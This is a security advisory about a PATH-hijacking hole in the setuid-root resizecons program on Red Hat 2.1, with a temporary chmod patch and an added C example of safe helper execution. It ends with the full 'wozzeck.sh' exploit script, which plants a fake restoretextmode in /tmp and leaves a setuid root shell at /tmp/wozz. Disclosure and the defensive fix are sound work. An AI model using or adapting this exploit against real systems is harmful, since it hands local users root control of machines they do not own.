There is a security hole in Red Hat 2.1, which installs the program
/usr/bin/resizecons suid root. The resizecons program allows a user
to change the video mode of the console. During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found via the PATH environment variable, while
still running with root privileges. It then executes setfont in the
same manner. By setting PATH so that a rogue restoretextmode is found
first, a user can execute an arbitrary program as root.

As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a screen redraw in an arbitrary process (one that handles
SIGWINCH) on the machine.

If /usr/bin/resizecons needs to be run by users other than root at the
console, the code must execute the outside utilities by absolute
pathname and check access rights on files before opening them.
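The fix described above, as an added example in C that is not the advisory's or the kbd package's code: helpers run by absolute path with a fixed environment, and the pid file is only read after its type and owner have been checked. It assumes a POSIX system and that the helper paths are constants compiled into the program.

```c
/* Added example (not the resizecons or kbd source): a setuid program running
 * helpers and opening the pid file safely, on POSIX, with fixed helper paths. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Fixed environment for helpers: the caller's PATH never reaches them. */
static char *const SAFE_ENV[] = { "PATH=/bin:/usr/bin", NULL };

/* Run a helper by absolute path via execve (no PATH search) under SAFE_ENV.
 * Returns the child's exit status, or -1 if the path is refused or exec fails. */
int run_helper(const char *path, char *const argv[])
{
    int status;
    pid_t pid;
    if (path == NULL || path[0] != '/' || strstr(path, "/../") != NULL)
        return -1;                    /* a bare "restoretextmode" is the bug */
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) {
        execve(path, argv, SAFE_ENV); /* execvp() or system() would search PATH */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

/* Open a pid file without trusting its location: no symlink, regular file
 * only, owned by the caller's real uid. Returns an fd, or -1 when refused. */
int open_pid_file_checked(const char *path)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != getuid()) {
        close(fd);                    /* wrong type or owner: do not read it */
        return -1;
    }
    return fd;
}

int main(void)
{   /* the exploit's PATH=/tmp has no effect on what the helper sees */
    char *const argv[] = { "/bin/sh", "-c", "test \"$PATH\" = /bin:/usr/bin", NULL };
    setenv("PATH", "/tmp", 1);
    return run_helper(argv[0], argv); /* exit status 0: helper saw the fixed PATH */
}
```

The owner check uses getuid(), the real uid, so a user can only make the program signal a process whose pid file they wrote themselves. Better still, send the SIGWINCH with privileges dropped to the real uid so the kernel's own permission check on kill() applies as well.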
Program: /usr/bin/resizecons
Affected Operating Systems: Red Hat 2.1 linux distribution
Requirements: account on system
Temporary Patch: chmod -s /usr/bin/resizecons
Security Compromise: root
Author: Dave M. (davem@cmu.edu)
Synopsis: resizecons runs restoretextmode without an
absolute pathname while executing as root,
allowing a user to substitute the real
program with arbitrary commands.
Exploit:
wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem@cmu.edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz. Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi